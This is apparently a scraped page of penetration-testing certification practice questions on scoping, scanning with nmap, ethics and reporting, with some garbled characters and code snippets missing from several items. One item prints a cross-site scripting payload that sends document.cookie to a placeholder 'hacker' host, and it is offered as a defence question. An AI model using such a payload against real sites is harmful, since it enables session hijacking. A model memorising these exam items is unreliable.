When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
A<#
B<$
C
D#$
E#!
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
AA signed statement of work
BThe correct user accounts and associated passwords
CThe expected time frame of the assessment
DThe proper emergency contacts for the client
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?
Anmap ג€"f ג€"sV ג€"p80 192.168.1.20
Bnmap ג€"sS ג€"sL ג€"p80 192.168.1.20
Cnmap ג€"A ג€"T4 ג€"p80 192.168.1.20
Dnmap ג€"O ג€"v ג€"p80 192.168.1.20
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
AAnalyze the malware to see what it does.
BCollect the proper evidence and then remove the malware.
CDo a root-cause analysis to find out how the malware got in.
DRemove the malware immediately.
EStop the assessment and inform the emergency contact.
Question 6
Information Gathering and Vulnerability Scanning
0
Question 7
Information Gathering and Vulnerability Scanning
Question 8
Tools and Code Analysis
Question 9
Planning and Scoping
Question 10
Planning and Scoping
Question 11
Reporting and Communication
Question 12
Tools and Code Analysis
Question 13
Attacks and Exploits
Question 14
Reporting and Communication
Question 15
Attacks and Exploits
Question 16
Planning and Scoping
Question 17
Planning and Scoping
Question 18
Planning and Scoping
Question 19
Attacks and Exploits
Question 20
Tools and Code Analysis
Question 21
Information Gathering and Vulnerability Scanning
Question 22
Planning and Scoping
Question 23
Reporting and Communication
Question 24
Planning and Scoping
Question 25
Information Gathering and Vulnerability Scanning
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ad
Want a break from the ads?
Become a Supporter and enjoy a completely ad-free experience, plus unlock Learn Mode, Exam Mode, AstroTutor AI, and more.
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would
BEST support this task?
ARun nmap with the ג€"o, -p22, and ג€"sC options set against the target
BRun nmap with the ג€"sV and ג€"p22 options set against the target
CRun nmap with the --script vulners option set against the target
DRun nmap with the ג€"sA option set against the target
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools?
(Choose two.)
AScraping social media sites
BUsing the WHOIS lookup tool
CCrawling the client's website
DPhishing company employees
EUtilizing DNS lookup tools
FConducting wardriving near the client facility
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
Which of the following commands should the penetration tester run post-engagement?
Agrep -v apache ~/.bash_history > ~/.bash_history
Brm -rf /tmp/apache
Cchmod 600 /tmp/apache
Dtaskkill /IM "apache" /F
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)
AThe libraries may be vulnerable
BThe licensing of software is ambiguous
CThe libraries' code bases could be read by anyone
DThe provenance of code is unknown
EThe libraries may be unsupported
FThe libraries may break the application
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
AWhether the cloud service provider allows the penetration tester to test the environment
BWhether the specific cloud services are being used by the application
CThe geographical location where the cloud services are running
DWhether the country where the cloud service is based has any impeding laws
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
AForensically acquire the backdoor Trojan and perform attribution
BUtilize the backdoor in support of the engagement
CContinue the engagement and include the backdoor finding in the final report
DInform the customer immediately about the backdoor
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:
Connected to 10.2.11.144 (::1) port 80 (#0)
> GET /readmine.html HTTP/1.1
> Host: 10.2.11.144
> User-Agent: curl/7.67.0
> Accept: /
>
Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Date: Tue, 02 Feb 2021 21:46:47 GMT
< Server: Apache/2.4.41 (Debian)
< Content-Length: 317
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE html>
<html lang=en>
<head>
<meta name=viewport content=width=device-width />
<meta http-equiv=Content-Type content=text/html; charset=utf-8 />
<title>WordPress › ReadMe</title>
<link rel=stylesheet href=wp-admin/css/install.css?ver=20100228 type=text/css />
</head>
Which of the following tools would be BEST for the penetration tester to use to explore this site further?
ABurp Suite
BDirBuster
CWPScan
DOWASP ZAP
HOTSPOT -
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS -
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
ABuffer overflows
BCross-site scripting
CRace-condition attacks
DZero-day attacks
EInjection flaws
FRansomware attacks
Given the following code:
<SCRIPT>var+img=new+Image();img.src=`http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
AWeb-application firewall
BParameterized queries
COutput encoding
DSession tokens
EInput validation
FBase64 encoding
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?
AThe reverse-engineering team may have a history of selling exploits to third parties.
BThe reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
CThe reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
DThe reverse-engineering team will be given access to source code for analysis.
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
AEnsure the client has signed the SOW.
BVerify the client has granted network access to the hot site.
CDetermine if the failover environment relies on resources not owned by the client.
DEstablish communication and escalation procedures with the client.
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
ANDA
BMSA
CSOW
DMOU
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
ANmap
Btcpdump
CScapy
Dhping3
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
ALook for open ports.
BListen for a reverse shell.
CAttempt to flood open ports.
DCreate an encrypted tunnel.
SIMULATION -
You are a penetration tester running port scans on a server.
INSTRUCTIONS -
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A penetration tester is reviewing the following SOW prior to engaging with a client: Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.
Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)
AUtilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
BUtilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
CFailing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
DSeeking help with the engagement in underground hacker forums by sharing the client's public IP address
EUsing a software-based erase tool to wipe the client's findings from the penetration tester's laptop
FRetaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?
AReach out to the primary point of contact
BTry to take down the attackers
CCall law enforcement officials immediately
DCollect the proper evidence and add to the final report
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?
AAs backup in case the original documents are lost
BTo guide them through the building entrances
CTo validate the billing information with the client
DAs proof in case they are discovered
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)
